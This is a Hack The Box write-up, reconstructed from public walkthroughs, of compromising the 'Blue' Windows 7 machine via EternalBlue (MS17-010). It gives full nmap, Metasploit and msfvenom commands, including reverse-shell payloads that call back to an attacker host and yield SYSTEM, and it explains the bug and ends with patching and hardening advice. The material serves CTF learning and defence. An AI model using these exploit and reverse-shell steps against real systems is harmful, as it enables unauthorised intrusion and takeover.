Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

Blue is the canonical EternalBlue box on HTB — a single-step compromise via CVE-2017-0143 (MS17-010) against an unpatched Windows 7 SP1 host running SMBv1. The vulnerability is a pool corruption bug in the Windows SMBv1 kernel driver that allows preauth remote code execution. Because SMB’s kernel driver runs in the SYSTEM context, there is no separate privilege-escalation step: every successful exploitation attempt lands NT AUTHORITY\SYSTEM directly.

Blue is a sibling of Legacy (also Windows + preauth SMB RCE, but via the older MS08-067 rather than EternalBlue). The two are worth comparing because they exercise the same general skill — “find the SMB CVE for this Windows version, run the PoC” — but with different exploit mechanics: MS08-067 is a stack buffer overflow in the Server service (user-mode) whereas MS17-010 is a pool corruption in srv.sys (kernel-mode), and their badchar requirements and shellcode strategies differ.

The non-obvious operational detail on both old SMB boxes is the legacy dialect requirement: modern OpenSSH and Samba clients refuse SMBv1 by default. Any tool that needs to speak to these hosts requires explicit client min protocol = NT1 or equivalent flags.

Source attribution

• 0xdf, “HTB: Blue”. Primary source. Covers the nmap vuln-scan fingerprint, Metasploit module, the worawit/MS17-010 manual scripts, and the SMB null-session gotcha.
• IppSec, “Blue” video walkthrough.
• Microsoft Security Bulletin MS17-010 (March 2017).
• worawit/MS17-010 GitHub PoC.
• helviojunior fork send_and_execute.py (simplified wrapper around the worawit scripts).

Recon

nmap -sC -sV -p- --min-rate=2000 -oN nmap/full.txt <TARGET>

135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1

The microsoft-ds banner on 445 and the OS string Windows 7 Professional 7601 SP1 are the complete fingerprint. Windows 7 SP1 shipped SMBv1 by default and MS17-010 applies to every unpatched build.

Run the vuln scripts to confirm before touching the exploit:

nmap -p445 --script=smb-vuln-ms17-010 <TARGET>

| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft
|       SMBv1 servers (ms17-010).

Confirmed. Proceed to exploit.

Foothold — CVE-2017-0143 (EternalBlue)

The bug is in srv.sys, the kernel-mode SMBv1 driver. A crafted SMB_COM_TRANSACTION2 packet with a mismatched TotalDataCount/ DataCount field triggers a pool allocation mismatch in the SrvOs2FeaToNt function. The overflow corrupts the non-paged pool, and the public exploit shapes the pool to position shellcode adjacent to a predictable structure, then overwrites a function pointer to redirect execution. Because srv.sys runs at kernel level, the exploit inherits NT AUTHORITY\SYSTEM — no further privilege escalation is needed.

Metasploit path

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET>
set LHOST <ATTACKER>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

The module handles pool grooming, overflow, and shellcode injection automatically. A successful run produces:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Manual path (worawit/MS17-010)

The worawit PoC repo contains zzz_exploit.py (the raw primitive) and helper utilities. The helviojunior fork simplifies it into send_and_execute.py, which uploads a payload binary and runs it as a Windows service:

# generate the payload
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER> LPORT=4444 \
    -f exe -o shell.exe

# run the exploit (requires non-empty username even for null sessions)
python3 send_and_execute.py <TARGET> shell.exe

The null-session gotcha: the SMB authentication step requires some username string even when using blank credentials. Pass '' or guest explicitly; an empty string causes a different error in some implementations of the PoC.

An x86 payload works on the 64-bit target because Windows 7’s WoW64 compatibility layer handles 32-bit service executables transparently. This differs from the architecture-mismatch issue on Optimum’s kernel exploit, where the exploit mechanism needs to match the kernel bitness — here the payload runs as a service, so WoW64 applies.

Flags

Both flags are readable from the SYSTEM shell without any lateral movement:

C:\Users\haris\Desktop\user.txt
C:\Users\Administrator\Desktop\root.txt

Why each step worked

• SMBv1 pool corruption runs in kernel context: the Windows SMB1 driver (srv.sys) processes requests in the kernel, so code execution within it has SYSTEM privileges by construction. There is no user→kernel boundary to cross after the overflow fires.
• No DEP/ASLR on kernel pool on Win7 SP1: the non-paged pool on Windows 7 does not have ASLR applied to pool allocations in the same way user-mode memory does. The exploit’s grooming technique places structures at predictable pool offsets, making the corruption reliable.
• SMBv1 enabled by default on Win7: Windows 7 shipped SMBv1 on by default to maintain backward compatibility with Windows XP clients and legacy shares. Microsoft disabled SMBv1 by default starting with Windows 10 1709 and Server 2019.

Counterfactuals

• Apply MS17-010 (March 2017). The patch has been available for over eight years; there is no operational justification for a 2026 host to be unpatched.
• Disable SMBv1: Set-SmbServerConfiguration -EnableSMB1Protocol $false on Windows, or min protocol = SMB2 in smb.conf on Linux. SMBv1 has no legitimate use in a modern network.
• Block tcp/445 at the network perimeter. SMB has no reason to be reachable from the internet.

Key Takeaways

• EternalBlue vs MS08-067: both are preauth SMB RCEs, but the mechanism differs (pool corruption in kernel driver vs. stack overflow in user-mode Server service). The operational feel is the same — fire a PoC, get SYSTEM — but understanding why each lands SYSTEM helps when adapting to non-default configurations.
• Confirming the vuln with smb-vuln-ms17-010 before running the exploit avoids destabilising a non-vulnerable target. The nmap script probes the negotiation without triggering the overflow.
• The send_and_execute.py null-session username requirement ('' vs omitted) is a common trip point when running the manual PoC. Always pass an explicit username argument even for unauthenticated sessions.

References

• 0xdf, “HTB: Blue”
• IppSec, “Blue”
• Microsoft Security Bulletin MS17-010
• worawit/MS17-010
• helviojunior/MS17-010 (send_and_execute.py fork)